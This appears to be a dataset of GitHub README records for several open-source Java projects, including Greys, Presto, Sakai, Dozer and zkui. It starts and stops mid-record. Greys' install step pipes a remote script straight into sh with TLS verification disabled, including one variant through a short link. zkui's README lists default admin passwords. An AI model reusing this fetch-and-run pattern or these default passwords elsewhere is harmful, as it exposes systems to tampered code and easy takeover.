If you know for sure there's an app compatible with Android Auto that is not included in AAAD, write to [submit.aaad@gmail.com](mailto:submit.aaad@gmail.com) - -### How do I update the apps installed from AAAD? - -AAAD will always download latest version of an app. If one of the apps that you've installed through AAAD gets an update, you can open AAAD and download the update. At the moment, there's no update checker, but I'm planning on making it! - -### Will you hold my bank account/credit card informations? - -No. All the details of payment are held by Stripe Inc. and not processed nor passed to myself in any way. Also, I don't really care. - -### Will this app be available on the Play Store? - -No. It is only officially distributed on GitHub. - -### Has the license an expiration date? - -No. AAAD is not a subscription, and once a license is obtained you won't be charged anymore. - -### What happens if I change my device? - -You can transfer a license with the feature ""Transfer license"" on the top right menu. The license will be crypted inside the device with a key that we will not hold in any way and the above method is the only way to move a license for AAAD pro. - -### What happens if I uninstall AAAD? - -Nothing. The date for next download will not be impacted and neither your AAAD pro version. - -# License - -Part of the source code of the app is shared so that changes can be implemented by whoever wants to do so for personal use, the full version of the software is **NOT** free, and you are not allowed to redistirbute modified versions of it, neither as a free application, niether as a commercial product. If you are intending to do so please seek my explicit writing approval for doing so. However you are allowed to modify the software as you wish as long as the modified version is **only** ever used by yourself. For more informations [please read the EULA](https://github.com/shmykelsa/AAAD/blob/main/LICENSE). 
- -### Copyright -Gabriele Rizzo (shmykelsa) © - 2023 - Lecce, Italia -",0 -oldmanpushcart/greys-anatomy,Java诊断工具,2012-11-21T19:39:35Z,,"![LOGO icon](https://raw.githubusercontent.com/oldmanpushcart/images/master/greys/greys-logo-readme.png) - -> -线上系统为何经常出错?数据库为何屡遭黑手?业务调用为何频频失败?连环异常堆栈案,究竟是哪次调用所为? -数百台服务器意外雪崩背后又隐藏着什么?是软件的扭曲还是硬件的沦丧? -走进科学带你了解Greys, Java线上问题诊断工具。 - -# 相关文档 - -* [关于软件](https://github.com/oldmanpushcart/greys-anatomy/wiki/Home) -* [程序安装](https://github.com/oldmanpushcart/greys-anatomy/wiki/installing) -* [入门说明](https://github.com/oldmanpushcart/greys-anatomy/wiki/Getting-Started) -* [常见问题](https://github.com/oldmanpushcart/greys-anatomy/wiki/FAQ) -* [更新记事](https://github.com/oldmanpushcart/greys-anatomy/wiki/Chronicle) -* [详细文档](https://github.com/oldmanpushcart/greys-anatomy/wiki/greys-pdf) -* [English-README](https://github.com/oldmanpushcart/greys-anatomy/blob/master/Greys_en.md) - -# 程序安装 - -- 远程安装 - - ```shell - curl -sLk http://ompc.oss.aliyuncs.com/greys/install.sh|sh - ``` - -- 远程安装(短链接) - - ```shell - curl -sLk http://t.cn/R2QbHFc|sh - ``` - -## 最新版本 - -### **VERSION :** 1.7.6.6 - -1. 支持JDK9 -2. greys.sh脚本支持tar的解压缩模式(有些机器没有unzip),默认unzip -3. 
修复 #219 问题 - -### 版本号说明 - -`主版本`.`大版本`.`小版本`.`漏洞修复` - -* 主版本 - - 这个版本更新说明程序架构体系进行了重大升级,比如之前的0.1版升级到1.0版本,整个软件的架构从单机版升级到了SOCKET多机版。并将Greys的性质进行的确定:Java版的HouseMD,但要比前辈们更强。 - -* 大版本 - - 程序的架构设计进行重大改造,但不影响用户对这款软件的定位。 - -* 小版本 - - 增加新的命令和功能 - -* 漏洞修复 - - 对现有版本进行漏洞修复和增强 - - - `主版本`、`大版本`、之间不做任何向下兼容的承诺,即`0.1`版本的Client不保证一定能正常访问`1.0`版本的Server。 - - - `小版本`不兼容的版本会在版本升级中指出 - - - `漏洞修复`保证向下兼容 - -# 维护者 - -* [李夏驰](http://www.weibo.com/vlinux) -* [姜小逸又胖了](http://weibo.com/chengtd) - - -# 程序编译 - -- 打开终端 - - ```shell - git clone git@github.com:oldmanpushcart/greys-anatomy.git - cd greys-anatomy/bin - ./greys-packages.sh - ``` - -- 程序执行 - - 在`target/`目录下生成对应版本的release文件,比如当前版本是`1.7.0.4`,则生成文件`target/greys-1.7.0.4-bin.zip` - - 程序在本地编译时会主动在本地安装当前编译的版本,所以编译完成后即相当在本地完成了安装。 - - -# 写在后边 - -## 心路感悟 - -我编写和维护这款软件已经5年了,5年中Greys也从`0.1`版本一直重构到现在的`1.7`。在这个过程中我得到了许多人的帮助与建议,并在年底我计划发布`2.0`版本,将开放Greys的底层通讯协议,支持websocket访问。 - -多年的问题排查经验我没有过多的分享,一个Java程序员个中的苦闷也无从分享,一切我都融入到了这款软件的命令中,希望这些沉淀能帮助到可能需要到的你少走一些弯路,同时我也非常期待你们对她的反馈,这样我将感到非常开心和有成就感。 - -## 帮助我们 - -Greys的成长需要大家的帮助。 - -- **分享你使用Greys的经验** - - 我非常希望能得到大家的使用反馈和经验分享,如果你有,请将分享文章敏感信息脱敏之后邮件给我:[oldmanpushcart@gmail.com](mailto:oldmanpushcart@gmail.com),我将会分享给更多的同行。 - -- **帮助我完善代码或文档** - - 一款软件再好,也需要详细的帮助文档;一款软件再完善,也有很多坑要埋。今天我的精力非常有限,希望能得到大家共同的帮助。 - -- **如果你喜欢这款软件,欢迎打赏一杯咖啡** - - 嗯,说实话,我是指望用这招来买辆玛莎拉蒂...当然是个玩笑~你们的鼓励将会是我的动力,钱不在乎多少,重要的是我将能从中得到大家善意的反馈,这将会是我继续前进的动力。 - - ![alipay](https://raw.githubusercontent.com/oldmanpushcart/images/master/alipay-vlinux.png) - -## 联系我们 - -有问题阿里同事可以通过旺旺找到我,阿里外的同事可以通过[我的微博](http://weibo.com/vlinux)联系到我。今晚的杭州大雪纷飞,明天西湖应该非常的美丽,大家晚安。 - -菜鸟-杜琨(dukun@alibaba-inc.com) - -",0 -prestodb/presto,The official home of the Presto distributed SQL query engine for big data,2012-08-09T01:03:37Z,,"# Presto - -Presto is a distributed SQL query engine for big data. - -See the [User Manual](https://prestodb.github.io/docs/current/) for deployment instructions and end user documentation. - -## Contributing! 
- -Please refer to the [contribution guidelines](https://github.com/prestodb/presto/blob/master/CONTRIBUTING.md) to get started - -## Questions? - -[Please join our Slack channel and ask in `#dev`](https://communityinviter.com/apps/prestodb/prestodb).",0 -TencentCloud/TIMSDK,"Tencent Cloud Chat features a comprehensive suite of solutions including global access, one-to-one chat, group chat, message push, profile and relationship chain hosting, and account authentication. ",2019-01-17T07:35:20Z,,"English | [简体中文](./README_ZH.md) - -Notice: If you open a pull request in TUIKit Android or iOS and the corresponding changes are successfully merged, your name will be included in README.md with a hyperlink to your homepage on GitHub. - -# Instant Messaging -## Product Introduction -Build real-time social messaging capabilities with all the features into your applications and websites based on powerful and feature-rich chat APIs, SDKs and UIKit components. - - - - - - - - - - -
Android Experience AppiOS Experience App
- -TUIKit is a UI component library based on Tencent Cloud IM SDK. It provides universal UI components to offer features such as conversation, chat, search, relationship chain, group, and audio/video call features. - - - -## Image Download - -Tencent Cloud branch download address: [Download](https://im.sdk.qcloud.com/download/github/TIMSDK.zip) - -## SDK Download - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Native SDK - Download Address -Integration Guide -Update Log -
Android GitHub (Recommended)[Quick Integration] TUIKit Integration (Android)
[General Integration] SDK Integration (Android)
Update Log (Native)
iOS GitHub (Recommended)[Quick Integration] TUIKit Integration (iOS)
[General Integration] SDK Integration (iOS)
Mac GitHub (Recommended)[General Integration] SDK Integration (Mac)
Windows GitHub (Recommended)[General Integration] SDK Integration (Windows)
HarmonyOS GitHub (Recommended)[General Integration] SDK Integration (HarmonyOS)
- -## TUIKit Integration - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Functional ModulePlatformDocument Link
TUIKit LibraryiOSTUIKit-iOS Library
AndroidTUIKit-Android Library
Quick IntegrationiOSTUIKit-iOS Quick Integration
AndroidTUIKit-Android Quick Integration
Modifying UI ThemesiOSTUIKit-iOS Modifying UI Themes
AndroidTUIKit-Android Modifying UI Themes
Setting UI StylesiOSTUIKit-iOS Setting UI Styles
AndroidTUIKit-Android Setting UI Styles
Adding Custom MessagesiOSTUIKit-iOS Adding Custom Messages
AndroidTUIKit-Android Adding Custom Messages
Implementing Local SearchiOSTUIKit-iOS Implementing Local Search
AndroidTUIKit-Android Implementing Local Search
Integrating Offline PushiOSTUIKit-iOS Integrating Offline Push
AndroidTUIKit-Android Integrating Offline Push
- -## Guidelines for Upgrading IMSDK to V2 APIs - -[API Upgrade Guidelines](https://docs.qq.com/sheet/DS3lMdHpoRmpWSEFW) - -## Latest Enhanced Version 7.9.5680 @2024.04.19 -### SDK - -- Fix the issue of the pinned message list returning in the wrong order -- Fix the issue of incorrect parsing of the Tips type of pinned messages -- Fix the issue of log writing failure on some Android phones -- Fix the occasional incomplete retrieval of group roaming messages from old to new -- Fix the occasional inability to retrieve local messages when pulling historical messages from topics -- Fix the issue where sessions deleted from the conversation group are reactivated after logging in again -",0 -sakaiproject/sakai,"Sakai is a freely available, feature-rich technology solution for learning, teaching, research and collaboration. Sakai is an open source software suite developed by a diverse and global adopter community.",2014-12-29T11:14:17Z,,"# Sakai Collaboration and Learning Environment (Sakai CLE) - -This is the source code for the Sakai CLE. - -The master branch is the most current development release, Sakai 24. -The other branches are currently or previously supported releases. See below for more information on the release plan and support schedule. - -## Building - -[![Build Status](https://travis-ci.org/sakaiproject/sakai.svg?branch=master)](https://travis-ci.org/sakaiproject/sakai) -[![Codacy Badge](https://api.codacy.com/project/badge/Grade/c68908d6bc044e95b453bae7ddcbad4a)](https://www.codacy.com/app/sakaiproject/sakai?utm_source=github.com&utm_medium=referral&utm_content=sakaiproject/sakai&utm_campaign=Badge_Grade) - -This is the ""Mini Quick Start"" for more complete steps to get Sakai configured please look at [this guide on the wiki](https://github.com/sakaiproject/sakai/wiki/Quick-Start-from-Source). - -To build Sakai you need Java 1.8. 
Once you have it, clone a copy of this repository; you can then
-build it by running the following (or `./mvnw install` if you don't have Maven installed):
-```
-mvn install
-```
-
-## Running
-
-Sakai runs on Apache Tomcat 9. Download the latest version from http://tomcat.apache.org and extract the archive.
-*Note: Sakai does not work with Tomcat installed via a package from apt-get, yum or other package managers.*
-
-You **must** configure Tomcat according to the instructions on this page:
-https://sakaiproject.atlassian.net/wiki/spaces/DOC/pages/17310646930/Sakai+21+Install+Guide+Source
-
-When you are done, deploy Sakai to Tomcat:
-```
-mvn clean install sakai:deploy -Dmaven.tomcat.home=/path/to/your/tomcat
-```
-
-Now start Tomcat:
-```
-cd /path/to/your/tomcat/bin
-./startup.sh && tail -f ../logs/catalina.out
-```
-
-Once Sakai has started up (it usually takes around 30 seconds), open your browser and navigate to http://localhost:8080/portal
-
-## Licensing
-
-Sakai is licensed under the [Educational Community License version 2.0](http://opensource.org/licenses/ECL-2.0)
-
-Sakai is an [Apereo Foundation](http://www.apereo.org) project and follows the Foundation's guidelines and requirements for [Contributor License Agreements](https://www.apereo.org/licensing).
-
-## Contributing
-
-See [our dedicated page](CONTRIBUTING.md) for more information on contributing to Sakai.
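Putting the build, deploy and start-up steps described above together, a complete local session can be sketched as follows. This is only a sketch: the `TOMCAT_HOME` value is an assumed example location rather than anything the project mandates, and each step is guarded so it is simply skipped when the corresponding tool is absent.

```shell
# Assumed example location of the Tomcat 9 install; adjust for your machine.
TOMCAT_HOME=$HOME/apache-tomcat-9

# Build Sakai and deploy it into Tomcat (skipped if Maven is not installed).
command -v mvn >/dev/null && mvn clean install sakai:deploy -Dmaven.tomcat.home=$TOMCAT_HOME

# Start Tomcat and follow the log until Sakai finishes booting
# (skipped if no startup script exists at the assumed path).
[ -x $TOMCAT_HOME/bin/startup.sh ] && $TOMCAT_HOME/bin/startup.sh && tail -f $TOMCAT_HOME/logs/catalina.out

# Once started (usually ~30 seconds), browse to http://localhost:8080/portal
true # keep the sketch's exit status clean when steps are skipped
```

After start-up, Sakai is reachable at http://localhost:8080/portal as described above.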
- -## Bugs - -For filing bugs against Sakai please use our Jira instance: https://jira.sakaiproject.org/ - -## Nightly servers -For testing out the latest builds go to the [nightly server page](http://nightly2.sakaiproject.org) - -## Get in touch -If you have any questions, please join the Sakai developer mailing list: To subscribe send an email to sakai-dev+subscribe@apereo.org - -To see a full list of Sakai email lists and other communication channels, please check out this Sakai wiki page: -https://confluence.sakaiproject.org/display/PMC/Sakai+email+lists - -If you want more immediate response during M-F typical business hours you could try our Slack channels. - -https://apereo.slack.com/signup - -If you can't find your ""at institution.edu"" on the Apereo signup page then send an email requesting access for yourself and your institution either to sakai-qa-planners@apereo.org or sakaicoordinator@apereo.org. - -## Community supported versions -These versions are actively supported by the community. - -Sakai 23.1 ([release](http://source.sakaiproject.org/release/23.1/) | [fixes](https://confluence.sakaiproject.org/display/DOC/23.1+Fixes+by+tool) | [notes](https://confluence.sakaiproject.org/display/DOC/Sakai+23+Release+Notes)) - -Sakai 22.4 ([release](http://source.sakaiproject.org/release/22.4/) | [fixes](https://confluence.sakaiproject.org/display/DOC/22.4+Fixes+by+tool) | [notes](https://confluence.sakaiproject.org/display/DOC/Sakai+22+Release+Notes)) - -## Previous community versions which are no longer supported -These versions are no longer supported by the community and will only receive security changes. 
- -Sakai 21.5 ([release](http://source.sakaiproject.org/release/21.5/) | [fixes](https://confluence.sakaiproject.org/display/DOC/21.5+Fixes+by+tool) | [notes](https://confluence.sakaiproject.org/display/DOC/Sakai+21+Release+Notes)) - -Sakai 20.6 ([release](http://source.sakaiproject.org/release/20.6/) | [fixes](https://confluence.sakaiproject.org/display/DOC/20.6+Fixes+by+tool) | [notes](https://confluence.sakaiproject.org/display/DOC/Sakai+20+Release+Notes)) - -Sakai 19.6 ([release](http://source.sakaiproject.org/release/19.6/) | [fixes](https://confluence.sakaiproject.org/display/DOC/19.6+Fixes+by+tool) | [notes](https://confluence.sakaiproject.org/display/DOC/Sakai+19+Release+Notes)) - -Sakai 12.7 ([release](http://source.sakaiproject.org/release/12.7/) | [notes](https://confluence.sakaiproject.org/display/DOC/Sakai+12+Release+Notes)) - -Sakai 11.4 ([release](http://source.sakaiproject.org/release/11.4/)) - -For full history of supported releases please see our [release information on confluence](https://confluence.sakaiproject.org/display/DOC/Sakai+Release+Date+list). - -## Under Development - -[Sakai 23.2](https://confluence.sakaiproject.org/display/REL/Sakai+23+Straw+person) is the current development release of Sakai 23. It is expected to release Q2 2024. - -[Sakai 22.5](https://confluence.sakaiproject.org/display/REL/Sakai+22+Straw+person) is the current development release of Sakai 22. It is expected to release Q2 2024. - -## Accessibility -[The Sakai Accessibility Working Group](https://confluence.sakaiproject.org/display/2ACC/Accessibility+Working+Group) is responsible for ensuring that the Sakai framework and its tools are accessible to persons with disabilities. [The Sakai Ra11y plan](https://confluence.sakaiproject.org/display/2ACC/rA11y+Plan) is working towards a VPAT and/or a WCAG2 certification. 
- -CKSource has created a GPL licensed open source version of their [Accessibility Checker](https://cksource.com/ckeditor/services#accessibility-checker) that lets you inspect the accessibility level of content created in CKEditor and immediately solve any accessibility issues that are found. CKEditor is the open source rich text editor used throughout Sakai. While the Accessibility Checker, due to the GPL license, can not be bundled with Sakai, it can be used with Sakai and the A11y group has created [instructions](https://confluence.sakaiproject.org/display/2ACC/CKEditor+Accessibility+Checker) to help you. - -## Skinning Sakai -Documentation on how to alter the Sakai skin (look and feel) is here https://github.com/sakaiproject/sakai/tree/master/library - -## Translating Sakai - -Translation, internationalization and localization of the Sakai project are coordinated by the Sakai Internationalization/localization community. This community maintains a publicly-accessible report that tracks what percentage of Sakai has been translated into various global languages and dialects. If the software is not yet available in your language, you can translate it with support from the broader Sakai Community to assist you. - -From its inception, the Sakai project has been envisioned and designed for global use. Complete or majority-complete translations of Sakai are available in the languages listed below. 
- -### Supported languages -| Locale | Language| -| ------ | ------ | -| en_US | English (Default) | -| ca_ES | Catalán | -| de_DE | German | -| es_ES | Español | -| eu | Euskera | -| fa_IR | Farsi | -| fr_FR | Français | -| hi_IN | Hindi | -| ja_JP | Japanese | -| mn | Mongolian | -| pt_BR | Portuguese (Brazil) | -| sv_SE | Swedish | -| tr_TR | Turkish | -| zh_CN | Chinese | -| ar | Arabic | -| ro_RO | Romanian | -| bg | Bulgarian | -| sr | Serbian | - -### Other languages - -Other languages have been declared legacy in Sakai 19 and have been moved to [Sakai Contrib as language packs](https://github.com/sakaicontrib/legacy-language-packs). - -## Community (contrib) tools -A number of institutions have written additional tools for Sakai that they use in their local installations, but are not yet in an official release of Sakai. These are being collected at https://github.com/sakaicontrib where you will find information about each one. You might find just the thing you are after! - - -",0 -qiurunze123/miaosha,⭐⭐⭐⭐秒杀系统设计与实现.互联网工程师进阶与分析🙋🐓,2018-09-14T04:36:24Z,,"![互联网 Java 秒杀系统设计与架构](https://raw.githubusercontent.com/qiurunze123/imageall/master/miaoshashejitu.png) - -> 朋友们,感谢大家对我文章的支持。时间过得很快, -这部分内容还是我几年前刚毕业时写的,而且也只是个人项目,被公众号文章给我一顿喷,博主内容我也看了,晚上回到家就简单的回复下, -想了一下,因为确实没精力维护,对于小白会造成误导,决定下线这个项目,这是我的第一个项目,就让他成回忆吧!以免对自己造成困扰! -大家以后还是可以微信交流其它问题,有时间也会为大家解答! - ->1.理性看待 - -我本意是将一些自己的思路和方向表达出来,因为star的激增,我也就做了最初的一版规划,那时候刚毕业没多久,很荣幸这个项目从一个小项目扩张成了大项目,但也都是一些当时不成熟的想法 ,项目没有完全完成, -也只是自己练手的入门级项目,旨在学习更多的知识,所有大家在看到这个项目的时候要有更多自己的思考和过滤,不要一味的照搬照抄!最后那些不理性的同学,给大家推荐俩本书 《我就是你啊》和《非暴力沟通》没准可以让你进化! -",0 -ag2s20150909/TTS,,2021-05-09T07:38:35Z,,,0 -DozerMapper/dozer,Dozer is a Java Bean to Java Bean mapper that recursively copies data from one object to another. 
,2012-01-23T21:11:58Z,,"[![Build, Test and Analyze](https://github.com/DozerMapper/dozer/actions/workflows/build.yml/badge.svg)](https://github.com/DozerMapper/dozer/actions/workflows/build.yml) -[![Release Version](https://img.shields.io/maven-central/v/com.github.dozermapper/dozer-core.svg?maxAge=2592000)](https://mvnrepository.com/artifact/com.github.dozermapper/dozer-core) -[![License](https://img.shields.io/hexpm/l/plug.svg?maxAge=2592000)]() - -# Dozer - -## Project Activity -The project is currently not active and will more than likely be deprecated in the future. If you are looking to use Dozer -on a greenfield project, we would discourage that. If you have been using Dozer for a while, we would suggest you start to think about migrating -onto another library, such as: -- [mapstruct](https://github.com/mapstruct/mapstruct) -- [modelmapper](https://github.com/modelmapper/modelmapper) - -For those moving to mapstruct, the community has created a [Intellij plugin](https://plugins.jetbrains.com/plugin/20853-dostruct) that can help with the migration. - -## Why Map? -A mapping framework is useful in a layered architecture where you are creating layers of abstraction by encapsulating changes to particular data objects vs. propagating these objects to other layers (i.e. external service data objects, domain objects, data transfer objects, internal service data objects). - -Mapping between data objects has traditionally been addressed by hand coding value object assemblers (or converters) that copy data between the objects. Most programmers will develop some sort of custom mapping framework and spend countless hours and thousands of lines of code mapping to and from their different data object. - -This type of code for such conversions is rather boring to write, so why not do it automatically? - - -## What is Dozer? 
-Dozer is a Java Bean to Java Bean mapper that recursively copies data from one object to another, it is an open source mapping framework that is robust, generic, flexible, reusable, and configurable. - -Dozer supports simple property mapping, complex type mapping, bi-directional mapping, implicit-explicit mapping, as well as recursive mapping. This includes mapping collection attributes that also need mapping at the element level. - -Dozer not only supports mapping between attribute names, but also automatically converting between types. Most conversion scenarios are supported out of the box, but Dozer also allows you to specify custom conversions via XML or code-based configuration. - -## Getting Started -Check out the [Getting Started Guide](https://dozermapper.github.io/gitbook/documentation/gettingstarted.html), [Full User Guide](https://dozermapper.github.io/user-guide.pdf) or [GitBook](https://dozermapper.github.io/gitbook/) for advanced information. - -## Getting the Distribution -If you are using Maven, simply copy-paste this dependency to your project. - -```XML - - com.github.dozermapper - dozer-core - 7.0.0 - -``` - -## Simple Example -```XML - - yourpackage.SourceClassName - yourpackage.DestinationClassName - - yourSourceFieldName - yourDestinationFieldName - - -``` - -```Java -SourceClassName sourceObject = new SourceClassName(); -sourceObject.setYourSourceFieldName(""Dozer""); - -Mapper mapper = DozerBeanMapperBuilder.buildDefault(); -DestinationClassName destObject = mapper.map(sourceObject, DestinationClassName.class); - -assertTrue(destObject.getYourDestinationFieldName().equals(sourceObject.getYourSourceFieldName())); -``` -",0 -DeemOpen/zkui,A UI dashboard that allows CRUD operations on Zookeeper.,2014-05-22T06:15:53Z,,"zkui - Zookeeper UI Dashboard -==================== -A UI dashboard that allows CRUD operations on Zookeeper. - -Requirements -==================== -Requires Java 7 to run. - -Setup -==================== -1. mvn clean install -2. 
Copy the config.cfg to the folder with the jar file. Modify it to point to the zookeeper instance. Multiple zk instances are comma separated, e.g. server1:2181,server2:2181. The first server should always be the leader.
-3. Run the jar. ( nohup java -jar zkui-2.0-SNAPSHOT-jar-with-dependencies.jar & )
-4. http://localhost:9090
-
-Login Info
-====================
-username: admin, pwd: manager (Admin privileges, CRUD operations supported)
-username: appconfig, pwd: appconfig (Readonly privileges, Read operations supported)
-
-You can change this in the config.cfg
-
-Technology Stack
-====================
-1. Embedded Jetty Server.
-2. Freemarker template.
-3. H2 DB.
-4. Active JDBC.
-5. JSON.
-6. SLF4J.
-7. Zookeeper.
-8. Apache Commons File upload.
-9. Bootstrap.
-10. Jquery.
-11. Flyway DB migration.
-
-Features
-====================
-1. CRUD operations on zookeeper properties.
-2. Export properties.
-3. Import properties via callback url.
-4. Import properties via file upload.
-5. History of changes + Path specific history of changes.
-6. Search feature.
-7. Rest API for accessing Zookeeper properties.
-8. Basic Role based authentication.
-9. LDAP authentication supported.
-10. Root node /zookeeper hidden for safety.
-11. ACLs supported at a global level.
-
-Import File Format
-====================
-# add property
-/appconfig/path=property=value
-# remove a property
--/path/property
-
-You can either upload a file or specify an HTTP URL of the version control system; that way all your zookeeper changes will be in version control.
-
-Export File Format
-====================
-/appconfig/path=property=value
-
-You can export a file and then use the same format to import.
-
-SOPA/PIPA BLACKLISTED VALUE
-====================
-All passwords will be displayed as SOPA/PIPA BLACKLISTED VALUE for a normal user. Admins will be able to view and edit the actual value upon login.
-Passwords are not shown in search / export / view for a normal user.
-For a property to be eligible for blacklisting it should have (PWD / pwd / PASSWORD / password) in the property name.
-
-LDAP
-====================
-If you want to use LDAP authentication, provide the LDAP URL. This will take precedence over roleSet property file authentication.
-ldapUrl=ldap://host:port/dc=mycom,dc=com
-If you don't provide this, the default roleSet file authentication will be used.
-
-REST call
-====================
-A lot of the time you need your shell scripts to be able to read properties from zookeeper. This can now be achieved with an HTTP call. Passwords are not exposed via the REST API for security reasons. The REST call is a read-only operation requiring no authentication.
-
-Eg:
-http://localhost:9090/acd/appconfig?propNames=foo&host=myhost.com
-This will first look up the hostname under /appconfig/hosts and then find out which path the host points to. Then it will look for the property under that path.
-
-There are 2 additional parameters that can be added to give better control.
-cluster=cluster1
-http://localhost:9090/acd/appconfig?propNames=foo&cluster=cluster1&host=myhost.com
-In this case the lookup will happen on lookup path + cluster1.
-
-app=myapp
-http://localhost:9090/acd/appconfig?propNames=foo&app=myapp&host=myhost.com
-In this case the lookup will happen on lookup path + myapp.
-
-A shell script can call this via
-MY_PROPERTY=""$(curl -f -s -S -k ""http://localhost:9090/acd/appconfig?propNames=foo&host=`hostname -f`"" | cut -d '=' -f 2)""
-echo $MY_PROPERTY
-
-Standardization
-====================
-Zookeeper doesn't enforce any order in which properties are stored and retrieved. ZKUI however organizes properties in the following manner for easy lookup.
-Each server/box has its hostname listed under /appconfig/hosts, and that entry points to the path where the properties for that host reside. So when the lookup for a property occurs over a REST call, it first finds the hostname entry under /appconfig/hosts and then looks for that property in the location mentioned.
-eg: /appconfig/hosts/myserver.com=/appconfig/dev/app1
-This means that when myserver.com tries to look up the property, it looks under /appconfig/dev/app1
-
-You can also append the app name to make lookup easy.
-eg: /appconfig/hosts/myserver.com:testapp=/appconfig/dev/test/app1
-eg: /appconfig/hosts/myserver.com:prodapp=/appconfig/dev/prod/app1
-
-Lookup can be done by grouping of app and cluster. A cluster can have many apps under it. When the bootstrap entry looks like /appconfig/hosts/myserver.com=/appconfig/dev, the REST lookup happens on the following paths.
-/appconfig/dev/..
-/appconfig/dev/hostname..
-/appconfig/dev/app..
-/appconfig/dev/cluster..
-/appconfig/dev/cluster/app..
-
-This standardization is only needed if you choose to use the REST lookup. You can use zkui to update properties in general without worrying about this organizing structure.
-
-HTTPS
-====================
-You can enable HTTPS if needed.
-keytool -keystore keystore -alias jetty -genkey -keyalg RSA
-
-
-Limitations
-====================
-1. ACLs are fully supported but at a global level.
-
-Screenshots
-====================
-Basic Role Based Authentication
-<br>
- -
- -Dashboard Console -
- -
- -CRUD Operations -
- -
- -Import Feature -
- -
- -Track History of changes -
- -
- -Status of Zookeeper Servers -
- -
- -License & Contribution -==================== - -ZKUI is released under the Apache 2.0 license. Comments, bugs, pull requests, and other contributions are all welcomed! - -Thanks to Jozef Krajčovič for creating the logo which has been used in the project. -https://www.iconfinder.com/iconsets/origami-birds -",0 -flutter/flutter-intellij,Flutter Plugin for IntelliJ,2016-07-25T22:31:03Z,,"# Flutter Plugin for IntelliJ - -[![Latest plugin version](https://img.shields.io/jetbrains/plugin/v/9212)](https://plugins.jetbrains.com/plugin/9212-flutter) -[![Build Status](https://travis-ci.org/flutter/flutter-intellij.svg)](https://travis-ci.org/flutter/flutter-intellij) - -An IntelliJ plugin for [Flutter](https://flutter.dev/) development. Flutter is a multi-platform -app SDK to help developers and designers build modern apps for iOS, Android and the web. - -## Documentation - -- [flutter.dev](https://flutter.dev) -- [Installing Flutter](https://flutter.dev/docs/get-started/install) -- [Getting Started with IntelliJ](https://flutter.dev/docs/development/tools/ide) - -## Fast development - -Flutter's hot reload helps you quickly and easily experiment, build UIs, add features, -and fix bugs faster. Experience sub-second reload times, without losing state, on emulators, -simulators, and hardware for iOS and Android. 
- - - -## Quick-start - -A brief summary of the [getting started guide](https://flutter.dev/docs/development/tools/ide): - -- install the [Flutter SDK](https://flutter.dev/docs/get-started/install) -- run `flutter doctor` from the command line to verify your installation -- ensure you have a supported IntelliJ development environment; either: - - the latest stable version of [IntelliJ](https://www.jetbrains.com/idea/download), Community or Ultimate Edition (EAP versions are not always supported) - - the latest stable version of [Android Studio](https://developer.android.com/studio) (note: Android Studio Canary versions are generally _not_ supported) -- open the plugin preferences - - `Preferences > Plugins` on macOS, `File > Settings > Plugins` on Linux, select ""Browse repositories…"" -- search for and install the 'Flutter' plugin -- choose the option to restart IntelliJ -- configure the Flutter SDK setting - - `Preferences` on macOS, `File>Settings` on Linux, select `Languages & Frameworks > Flutter`, and set - the path to the root of your flutter repo - -## Filing issues - -Please use our [issue tracker](https://github.com/flutter/flutter-intellij/issues) -for Flutter IntelliJ issues. - -- for more general Flutter issues, you should prefer to use the Flutter - [issue tracker](https://github.com/flutter/flutter/issues) -- for more Dart IntelliJ related issues, you can use JetBrains' - [YouTrack tracker](https://youtrack.jetbrains.com/issues?q=%23Dart%20%23Unresolved%20) - -## Known issues - -Please note the following known issues: - -- [#601](https://github.com/flutter/flutter-intellij/issues/601): IntelliJ will - read the PATH variable just once on startup. Thus, if you change PATH later to - include the Flutter SDK path, this will not have an affect in IntelliJ until you - restart the IDE. 
-- If you require network access to go through proxy settings, you will need to set the
-  `https_proxy` variable in your environment as described in the
-  [pub docs](https://dart.dev/tools/pub/troubleshoot#pub-get-fails-from-behind-a-corporate-firewall).
-  (See also: [#2914](https://github.com/flutter/flutter-intellij/issues/2914).)
-
-## Dev Channel
-
-If you like getting new features as soon as they've been added to the code, then you
-might want to try out the dev channel. It is updated weekly with the latest contents
-from the ""master"" branch. It has minimal testing. Setup instructions are in the wiki's
-[dev channel page](https://github.com/flutter/flutter-intellij/wiki/Dev-Channel).
-",0
-spring-cloud/spring-cloud-netflix,Integration with Netflix OSS components,2014-07-11T15:46:12Z,,,0
-zouzg/mybatis-generator-gui,A GUI for mybatis-generator that makes generating code simpler and faster,2016-05-08T22:39:39Z,,"mybatis-generator-gui
-==============
-
-mybatis-generator-gui is a GUI tool built on top of [mybatis generator](http://www.mybatis.org/generator/index.html). It makes it very easy and fast to generate MyBatis Java POJO files and database mapping files.
-
-![image](https://user-images.githubusercontent.com/3505708/49334784-1a42c980-f619-11e8-914d-9ea85db9cec3.png)
-
-
-![basic](https://user-images.githubusercontent.com/3505708/51911610-45754980-240d-11e9-85ad-643e55cafab2.png)
-
-
-![overSSH](https://user-images.githubusercontent.com/3505708/51911646-5920b000-240d-11e9-9048-738306a56d14.png)
-
-![SearchSupport](https://user-images.githubusercontent.com/8142133/115959972-881d2200-a541-11eb-8ad4-052f379b91f1.png)
-
-
-### Core features
-* Generate code by following the steps in the UI, skipping the tedious process of learning and writing the generator XML configuration
-* Save database connections and generator configurations, so every code generation run takes only a couple of clicks
-* Ships with commonly used plugins built in, such as a pagination plugin
-* OverSSH support: reach databases on your company intranet through an SSH tunnel
-* Table and column comments from the database become comments on the generated Java entities, keeping the entities clear and readable
-* Optionally strip comments that are unfriendly to version control, so files regenerated after adding or removing columns produce clean diffs
-* MySQL, MySQL 8, Oracle, PostgreSQL and SQL Server are currently supported; other niche databases are not. (MySQL support is the most mature; problems with other databases can be reported in the issues)
-
-### Runtime requirements (important!!!)
-This tool only supports the two most recent Java LTS versions, JDK 8 and JDK 11
-* JDK 1.8 must be version 1.8.0.60 or above
-* Java 11 has no version requirement
-
-### Run directly (optional)
-Running directly from an IDE is recommended. If you need a binary installer, you can follow the official account to get one; Windows and MacOS are currently supported. Check that your JDK is 1.8 and that its version is above 1.8.0.60
-
-
-### Starting the application
-
-* Option 1: follow the WeChat official account “搬砖头也要有态度” and reply “GUI” to get a download link
-
-  ![image](https://user-images.githubusercontent.com/3505708/61360019-2893dc00-a8b0-11e9-8dc9-a020e997ab87.png)
-
-* Option 2: build it yourself
-
-  ```bash
